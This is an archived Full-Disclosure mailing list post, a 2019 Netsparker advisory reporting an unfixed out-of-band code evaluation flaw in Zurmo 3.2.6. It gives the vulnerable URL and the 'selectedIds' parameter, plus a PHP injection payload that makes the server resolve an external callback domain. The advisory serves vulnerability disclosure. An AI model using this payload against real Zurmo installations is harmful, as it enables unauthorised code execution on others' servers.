lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 25 Jul 2019 11:38:04 +0200
From: Daniel Bishtawi <daniel@...sparker.com>
To: fulldisclosure@...lists.org, vuln@...unia.com, 
 submissions@...ketstormsecurity.org
Subject: [FD] Out of Band Code Evaluation Vulnerability in Zurmo 3.2.6

Hello,

We are informing you about the vulnerabilities in Zurmo 3.2.6.

Here are the details:

Information
--------------------
Advisory by Netsparker
Name: Out of Band Code Evaluation in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Out of Band Code Evaluation
Severity: Critical
Status: Not Fixed
Netsparker Advisory Reference: NS-19-009

Technical Details
--------------------

URL: http://
{DOMAIN}/zurmo/app/index.php/contacts/default/?_=1557483057859&ajax=list-view&Contact_page=&Contact_sort=&selectedIds=gethostbyname(trim('jnakpvs_zm8e35fk-ro1tuqv0l91lzlao8tgo6_5'.'
6j4.r87.me'))
Parameter Name: selectedIds
Parameter Type: GET
Attack Pattern:
gethostbyname(trim(%27jnakpvs_zm8e35fk-ro1tuqv0l91lzlao8tgo6_5%27.%
276j4.r87.me%27))

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-009-out-of-band-code-evaluation-in-zurmo/


Regards,
Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Tel: +44 (0)20 3588 3843
Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn
<https://www.linkedin.com/company/netsparker-ltd> | Facebook
<https://facebook.com/netsparker>
<https://www.netsparker.com/blog/events/exhibiting-black-hat-usa-2019/>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ